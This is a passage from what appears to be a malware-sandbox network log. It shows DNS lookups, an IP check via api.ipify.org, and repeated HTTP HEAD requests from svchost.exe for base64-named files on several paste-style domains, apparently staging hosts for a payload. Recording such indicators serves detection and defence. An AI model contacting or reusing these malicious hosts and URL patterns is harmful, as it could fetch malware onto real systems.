                                                              Jan 12, 2025 09:26:19.292085886 CET1.1.1.1192.168.2.70xdebNo error (0)pastesnap.com104.21.60.172A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:19.351217031 CET1.1.1.1192.168.2.70x313No error (0)pastesnap.com104.21.60.172A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:19.351217031 CET1.1.1.1192.168.2.70x313No error (0)pastesnap.com172.67.198.113A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.058024883 CET1.1.1.1192.168.2.70x6c3bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.058024883 CET1.1.1.1192.168.2.70x6c3bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.058024883 CET1.1.1.1192.168.2.70x6c3bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.830581903 CET1.1.1.1192.168.2.70xb5a7No error (0)wavepassage.cfd188.114.97.3A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.830581903 CET1.1.1.1192.168.2.70xb5a7No error (0)wavepassage.cfd188.114.96.3A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:43.857870102 CET1.1.1.1192.168.2.70xcfd8No error (0)textbinvault.com172.67.176.186A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:43.857870102 CET1.1.1.1192.168.2.70xcfd8No error (0)textbinvault.com104.21.17.117A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.64.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.16.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.80.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.48.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.96.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.112.1A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.354959011 CET1.1.1.1192.168.2.70xa834No error (0)securetextweb.cc104.21.32.1A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • pastesnap.com
                                                              • api.ipify.org

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749857188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:42.837050915 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:43.320178032 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:43 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVNZ4FbFysVM%2BQutercdvETi8sm4Tj8TuJN7dNnaeThGNrT2ejrhsiDlSxdF6CrZjZMUJ8RY%2F0bQzwpayXfGd5XsxHZj%2FNBShFI1lb%2F8DpL8BTzDvLr6p%2FrRx%2BpPDkoAwkg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3646838428b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=2153&rtt_var=1076&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749862172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:43.327511072 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:43.815934896 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:43 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9sn9J0HfiwxXoVW5w8jJC1Xbk8%2F5GZX13%2Bmx%2FggLnujvNFatfZ4Px0p%2Fg2l7BSL%2FgNEdFXFPYBe%2BUaeUYaba%2BHTPiwoXDrHh6brFfzo5epbLwcw2vqUaARGpJ7ebTAC"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3676e3232fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749872172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:43.865554094 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:44.336540937 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxwFGpfyRlz%2FwSlFFwH%2F43kS6cxtjbE0Zye5cwc9PZFT9LpBxEf2Qy3m0VUwNSNkl717eJkAj%2BizxBPRMh7uf6Ao6lWFfmgJ8LnVkA8I4%2FQgjOxVwB%2BZfv5sK%2FzArkhVn%2F6K"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36acdaede9a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749874188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:44.072865009 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:44.533900976 CET878INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQXYaUbR9od1rkbmFK%2Fs5LbPNSPMVh0gLaMDsEioKxsNq8qkoK%2BzD9QvVrmIWt0q2YZD3lJLHYjmw%2FarYM2YVUNPw0bnPxVd2%2By0b%2B9%2B4DiWVxOQ7ED1GDtWRaLMyisv4ng%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36bfd790f5b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.749880104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:44.399944067 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:44.889475107 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BSqZ6aJoZpQah70MPGt0egvYStLdp%2FHW7%2FYXwHO1NBI2Ubqw82wHDpASsKSGWPFUlUnDNJNhjT0uftTmh%2F8XEDMnwvrZIvWhrIA4IeXwZoj6qumtIEBEPnR8yc0C7K%2BVTce"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36e2e4b8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.749882172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:44.571243048 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:45.056775093 CET870INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GdNPAt21UszN7i7LuW%2FNK%2FNuGZ3yVUxYRBRrYYbr3y%2BYNz9rsDwLk3iVuQJDZFZptI6GOKcoW4%2Br95%2ByCUtA6yKGk%2FAoXJ9TyghCO7XYva%2FGPGr8zsXfdB%2Bhuwp3lJhK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36f48c719cb-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.749886172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:45.100444078 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:45.530103922 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2H39OcdOn2DabCtnltVgg8%2FO2Z3csqzZtBDRSGjUZElHnV2GBgy3POfH5UdQF7u0CWkYrZiizNNLgHzHEbqfI1bLWaMkZhpWxfXxNTrNogn%2BKpu8LFU3ZBLugviElamSZq5%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3723e41c42c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.749892104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:45.536559105 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.011811018 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ijtp%2BEUnOfSb%2BkjgjtZrgbkU%2BlDW5O0jGHMsJkAwGJDABCNL6BXIHqbNwtE2dt2ckVqmMRjC%2BqOtAjIezgImUquCMgpwwwgbXCkCE2U1HMhCyKjfZCkmk%2FJLfXjrojkYx86i"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37538657c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.749894188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:45.653223038 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.129633904 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qXGJHtD4iLBWTQVCjZA4hEU6ulaNchep8sFIA7%2BU32hB4H9oTXF5liaX1FOzF684p6D%2BZQirmzCxHTL4ulKQVQTz03Q3hV5i%2BH%2BxghtgJB2okcSMUXmuOk6%2F8CQFR2rCFs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc375fe01437a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.749904172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:46.136244059 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.617383003 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0E94SfUI8tCSYiHJDFIRI9VEktBLWO%2Bbm4KibOWu76HwGDge4oE8Ab4jWhyVF1BVgB10hTsIOR%2FWiksWHZGiyYgwxEl2rOrDHOoFWKVsKmY6PYbUsiG7STi4VE%2FHM6w"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc378f8ef42c9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.749906188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:46.481465101 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.957870007 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3braQ6KlQC08vpjn05mOLETwpVKyEOiyDhvjyf0sGF6jWX5f2ZnuAk2f1GqrSep2tnBsLmt7MxWyl0tDXP9XY8NVwIfDmfEoT35nkROzAp4STjN3FXz%2BxRkEauyg9XRSiR4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37b19c772a7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.749908172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:46.624032974 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.104862928 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUhzoqEXe%2BIP2tuD9%2BgdNjEW22o1pZywjfaZDenYc%2F82RngvemayWG5kXxgMFTuEuxg%2BuUu8geWqILeRgwbh21pCCaXt4S8bgV37H9JDwKU5Yfn1aRMHY8qS3zYXACPTBByh"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37c0f6e4321-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.749915172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:46.964274883 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.419704914 CET858INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SIzCvDTZQ4j2AiUAwm2iTRKoO1EPDrnmtaIWpR90Ehsrh8xINQAoYWwLovSBS0CSAD1Skb9TUbeQN9vr0Lqw8Vw1%2FVpgV2LjF2r1qOo%2FGbGGktvaHPZvAkme7iQWnG5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37e0b200ca8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.749917104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:47.112185001 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.578442097 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaXJ%2FfJfYOMShKIVSkVMpJok5se8Yix8pmDidh57GVqchkHkfLonZnsFgNBJ1GDp7ASPUBL8EvLcT4xMyS85va0Gu79W%2F4FOgmY6riPv3CRZi9w6KmT1YRoSl2uCl7w2Rjmg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37f0942de95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.749920172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:47.427112103 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.889683008 CET872INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gevHvOtAOM3wyYZo7Ey5exJa71MsVhvv5rD%2BFp4DnKREgA9uLAtVQcTfJcwrYVGUWOBz2BRDnvQBlDBznqxfdR%2F6hpMHtaAIGGCL5WoemCb1d9b4eOC%2F7GOTE33ebnNIuW24"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc380fa307cea-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.749929104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:47.937722921 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:48.387614965 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:48 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uktk5uaHjqhIDQbjxLdjs7N%2FWkTytKrgDc5jByzr0Mx4DBqg52VJPm6R8A49hexsKnBEtDUvmknKNOkI3mM97w5x850blKhblo2J6GlUcsg4I9YfL8HRBaOt%2FfqaX%2B1C4zFP"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38419188ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.749931188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:48.104233027 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:48.562022924 CET878INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:48 GMT
                                                              Content-Type: text/html
